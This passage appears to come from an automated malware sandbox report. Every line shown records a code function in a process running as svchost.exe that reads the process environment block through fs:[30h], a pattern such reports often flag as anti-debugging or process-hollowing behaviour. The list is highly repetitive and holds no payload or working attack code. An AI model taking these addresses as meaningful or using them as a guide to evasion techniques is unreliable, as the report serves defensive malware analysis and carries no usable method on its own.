            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035307AF mov eax, dword ptr fs:[00000030h]2_2_035307AF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E47A0 mov eax, dword ptr fs:[00000030h]2_2_035E47A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354C640 mov eax, dword ptr fs:[00000030h]2_2_0354C640
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03562674 mov eax, dword ptr fs:[00000030h]2_2_03562674
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F866E mov eax, dword ptr fs:[00000030h]2_2_035F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F866E mov eax, dword ptr fs:[00000030h]2_2_035F866E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356A660 mov eax, dword ptr fs:[00000030h]2_2_0356A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356A660 mov eax, dword ptr fs:[00000030h]2_2_0356A660
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03572619 mov eax, dword ptr fs:[00000030h]2_2_03572619
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE609 mov eax, dword ptr fs:[00000030h]2_2_035AE609
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]2_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]2_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]2_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]2_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]2_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]2_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354260B mov eax, dword ptr fs:[00000030h]2_2_0354260B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0354E627 mov eax, dword ptr fs:[00000030h]2_2_0354E627
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03566620 mov eax, dword ptr fs:[00000030h]2_2_03566620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03568620 mov eax, dword ptr fs:[00000030h]2_2_03568620
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353262C mov eax, dword ptr fs:[00000030h]2_2_0353262C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0356A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356A6C7 mov eax, dword ptr fs:[00000030h]2_2_0356A6C7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE6F2 mov eax, dword ptr fs:[00000030h]2_2_035AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE6F2 mov eax, dword ptr fs:[00000030h]2_2_035AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE6F2 mov eax, dword ptr fs:[00000030h]2_2_035AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE6F2 mov eax, dword ptr fs:[00000030h]2_2_035AE6F2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B06F1 mov eax, dword ptr fs:[00000030h]2_2_035B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B06F1 mov eax, dword ptr fs:[00000030h]2_2_035B06F1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03534690 mov eax, dword ptr fs:[00000030h]2_2_03534690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03534690 mov eax, dword ptr fs:[00000030h]2_2_03534690
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035666B0 mov eax, dword ptr fs:[00000030h]2_2_035666B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356C6A6 mov eax, dword ptr fs:[00000030h]2_2_0356C6A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03538550 mov eax, dword ptr fs:[00000030h]2_2_03538550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03538550 mov eax, dword ptr fs:[00000030h]2_2_03538550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356656A mov eax, dword ptr fs:[00000030h]2_2_0356656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356656A mov eax, dword ptr fs:[00000030h]2_2_0356656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356656A mov eax, dword ptr fs:[00000030h]2_2_0356656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C6500 mov eax, dword ptr fs:[00000030h]2_2_035C6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]2_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]2_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]2_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]2_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]2_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]2_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604500 mov eax, dword ptr fs:[00000030h]2_2_03604500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]2_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]2_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]2_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]2_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]2_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540535 mov eax, dword ptr fs:[00000030h]2_2_03540535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E53E mov eax, dword ptr fs:[00000030h]2_2_0355E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E53E mov eax, dword ptr fs:[00000030h]2_2_0355E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E53E mov eax, dword ptr fs:[00000030h]2_2_0355E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E53E mov eax, dword ptr fs:[00000030h]2_2_0355E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E53E mov eax, dword ptr fs:[00000030h]2_2_0355E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035365D0 mov eax, dword ptr fs:[00000030h]2_2_035365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356A5D0 mov eax, dword ptr fs:[00000030h]2_2_0356A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356A5D0 mov eax, dword ptr fs:[00000030h]2_2_0356A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E5CF mov eax, dword ptr fs:[00000030h]2_2_0356E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E5CF mov eax, dword ptr fs:[00000030h]2_2_0356E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]2_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]2_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]2_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]2_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]2_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]2_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]2_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355E5E7 mov eax, dword ptr fs:[00000030h]2_2_0355E5E7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035325E0 mov eax, dword ptr fs:[00000030h]2_2_035325E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356C5ED mov eax, dword ptr fs:[00000030h]2_2_0356C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356C5ED mov eax, dword ptr fs:[00000030h]2_2_0356C5ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E59C mov eax, dword ptr fs:[00000030h]2_2_0356E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03532582 mov eax, dword ptr fs:[00000030h]2_2_03532582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03532582 mov ecx, dword ptr fs:[00000030h]2_2_03532582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03564588 mov eax, dword ptr fs:[00000030h]2_2_03564588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035545B1 mov eax, dword ptr fs:[00000030h]2_2_035545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035545B1 mov eax, dword ptr fs:[00000030h]2_2_035545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B05A7 mov eax, dword ptr fs:[00000030h]2_2_035B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B05A7 mov eax, dword ptr fs:[00000030h]2_2_035B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B05A7 mov eax, dword ptr fs:[00000030h]2_2_035B05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035EA456 mov eax, dword ptr fs:[00000030h]2_2_035EA456
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352645D mov eax, dword ptr fs:[00000030h]2_2_0352645D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355245A mov eax, dword ptr fs:[00000030h]2_2_0355245A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]2_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]2_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]2_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]2_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]2_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]2_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]2_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356E443 mov eax, dword ptr fs:[00000030h]2_2_0356E443
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355A470 mov eax, dword ptr fs:[00000030h]2_2_0355A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355A470 mov eax, dword ptr fs:[00000030h]2_2_0355A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355A470 mov eax, dword ptr fs:[00000030h]2_2_0355A470
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BC460 mov ecx, dword ptr fs:[00000030h]2_2_035BC460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03568402 mov eax, dword ptr fs:[00000030h]2_2_03568402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03568402 mov eax, dword ptr fs:[00000030h]2_2_03568402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03568402 mov eax, dword ptr fs:[00000030h]2_2_03568402
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356A430 mov eax, dword ptr fs:[00000030h]2_2_0356A430
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352E420 mov eax, dword ptr fs:[00000030h]2_2_0352E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352E420 mov eax, dword ptr fs:[00000030h]2_2_0352E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352E420 mov eax, dword ptr fs:[00000030h]2_2_0352E420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352C427 mov eax, dword ptr fs:[00000030h]2_2_0352C427
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]2_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]2_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]2_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]2_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]2_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]2_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B6420 mov eax, dword ptr fs:[00000030h]2_2_035B6420
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035304E5 mov ecx, dword ptr fs:[00000030h]2_2_035304E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035EA49A mov eax, dword ptr fs:[00000030h]2_2_035EA49A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035644B0 mov ecx, dword ptr fs:[00000030h]2_2_035644B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BA4B0 mov eax, dword ptr fs:[00000030h]2_2_035BA4B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035364AB mov eax, dword ptr fs:[00000030h]2_2_035364AB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03528B50 mov eax, dword ptr fs:[00000030h]2_2_03528B50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DEB50 mov eax, dword ptr fs:[00000030h]2_2_035DEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E4B4B mov eax, dword ptr fs:[00000030h]2_2_035E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E4B4B mov eax, dword ptr fs:[00000030h]2_2_035E4B4B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C6B40 mov eax, dword ptr fs:[00000030h]2_2_035C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C6B40 mov eax, dword ptr fs:[00000030h]2_2_035C6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035FAB40 mov eax, dword ptr fs:[00000030h]2_2_035FAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D8B42 mov eax, dword ptr fs:[00000030h]2_2_035D8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0352CB7E mov eax, dword ptr fs:[00000030h]2_2_0352CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03602B57 mov eax, dword ptr fs:[00000030h]2_2_03602B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03602B57 mov eax, dword ptr fs:[00000030h]2_2_03602B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03602B57 mov eax, dword ptr fs:[00000030h]2_2_03602B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03602B57 mov eax, dword ptr fs:[00000030h]2_2_03602B57
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]2_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]2_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]2_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]2_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]2_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]2_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]2_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]2_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AEB1D mov eax, dword ptr fs:[00000030h]2_2_035AEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604B00 mov eax, dword ptr fs:[00000030h]2_2_03604B00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355EB20 mov eax, dword ptr fs:[00000030h]2_2_0355EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355EB20 mov eax, dword ptr fs:[00000030h]2_2_0355EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F8B28 mov eax, dword ptr fs:[00000030h]2_2_035F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035F8B28 mov eax, dword ptr fs:[00000030h]2_2_035F8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DEBD0 mov eax, dword ptr fs:[00000030h]2_2_035DEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03550BCB mov eax, dword ptr fs:[00000030h]2_2_03550BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03550BCB mov eax, dword ptr fs:[00000030h]2_2_03550BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03550BCB mov eax, dword ptr fs:[00000030h]2_2_03550BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03530BCD mov eax, dword ptr fs:[00000030h]2_2_03530BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03530BCD mov eax, dword ptr fs:[00000030h]2_2_03530BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03530BCD mov eax, dword ptr fs:[00000030h]2_2_03530BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03538BF0 mov eax, dword ptr fs:[00000030h]2_2_03538BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03538BF0 mov eax, dword ptr fs:[00000030h]2_2_03538BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03538BF0 mov eax, dword ptr fs:[00000030h]2_2_03538BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355EBFC mov eax, dword ptr fs:[00000030h]2_2_0355EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BCBF0 mov eax, dword ptr fs:[00000030h]2_2_035BCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540BBE mov eax, dword ptr fs:[00000030h]2_2_03540BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540BBE mov eax, dword ptr fs:[00000030h]2_2_03540BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E4BB0 mov eax, dword ptr fs:[00000030h]2_2_035E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035E4BB0 mov eax, dword ptr fs:[00000030h]2_2_035E4BB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]2_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]2_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]2_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]2_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]2_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]2_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03536A50 mov eax, dword ptr fs:[00000030h]2_2_03536A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540A5B mov eax, dword ptr fs:[00000030h]2_2_03540A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03540A5B mov eax, dword ptr fs:[00000030h]2_2_03540A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035ACA72 mov eax, dword ptr fs:[00000030h]2_2_035ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035ACA72 mov eax, dword ptr fs:[00000030h]2_2_035ACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356CA6F mov eax, dword ptr fs:[00000030h]2_2_0356CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356CA6F mov eax, dword ptr fs:[00000030h]2_2_0356CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356CA6F mov eax, dword ptr fs:[00000030h]2_2_0356CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035DEA60 mov eax, dword ptr fs:[00000030h]2_2_035DEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BCA11 mov eax, dword ptr fs:[00000030h]2_2_035BCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03554A35 mov eax, dword ptr fs:[00000030h]2_2_03554A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03554A35 mov eax, dword ptr fs:[00000030h]2_2_03554A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356CA38 mov eax, dword ptr fs:[00000030h]2_2_0356CA38
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356CA24 mov eax, dword ptr fs:[00000030h]2_2_0356CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0355EA2E mov eax, dword ptr fs:[00000030h]2_2_0355EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03530AD0 mov eax, dword ptr fs:[00000030h]2_2_03530AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03564AD0 mov eax, dword ptr fs:[00000030h]2_2_03564AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03564AD0 mov eax, dword ptr fs:[00000030h]2_2_03564AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03586ACC mov eax, dword ptr fs:[00000030h]2_2_03586ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03586ACC mov eax, dword ptr fs:[00000030h]2_2_03586ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03586ACC mov eax, dword ptr fs:[00000030h]2_2_03586ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356AAEE mov eax, dword ptr fs:[00000030h]2_2_0356AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0356AAEE mov eax, dword ptr fs:[00000030h]2_2_0356AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03568A90 mov edx, dword ptr fs:[00000030h]2_2_03568A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]2_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]2_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]2_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]2_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]2_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]2_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]2_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]2_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353EA80 mov eax, dword ptr fs:[00000030h]2_2_0353EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604A80 mov eax, dword ptr fs:[00000030h]2_2_03604A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03538AA0 mov eax, dword ptr fs:[00000030h]2_2_03538AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03538AA0 mov eax, dword ptr fs:[00000030h]2_2_03538AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03586AA4 mov eax, dword ptr fs:[00000030h]2_2_03586AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B0946 mov eax, dword ptr fs:[00000030h]2_2_035B0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03604940 mov eax, dword ptr fs:[00000030h]2_2_03604940
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D4978 mov eax, dword ptr fs:[00000030h]2_2_035D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035D4978 mov eax, dword ptr fs:[00000030h]2_2_035D4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BC97C mov eax, dword ptr fs:[00000030h]2_2_035BC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03556962 mov eax, dword ptr fs:[00000030h]2_2_03556962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03556962 mov eax, dword ptr fs:[00000030h]2_2_03556962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03556962 mov eax, dword ptr fs:[00000030h]2_2_03556962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0357096E mov eax, dword ptr fs:[00000030h]2_2_0357096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0357096E mov edx, dword ptr fs:[00000030h]2_2_0357096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0357096E mov eax, dword ptr fs:[00000030h]2_2_0357096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035BC912 mov eax, dword ptr fs:[00000030h]2_2_035BC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03528918 mov eax, dword ptr fs:[00000030h]2_2_03528918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03528918 mov eax, dword ptr fs:[00000030h]2_2_03528918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE908 mov eax, dword ptr fs:[00000030h]2_2_035AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035AE908 mov eax, dword ptr fs:[00000030h]2_2_035AE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035B892A mov eax, dword ptr fs:[00000030h]2_2_035B892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035C892B mov eax, dword ptr fs:[00000030h]2_2_035C892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]2_2_0353A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]2_2_0353A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0353A9D0 mov eax, dword ptr fs:[00000030h]2_2_0353A9D0
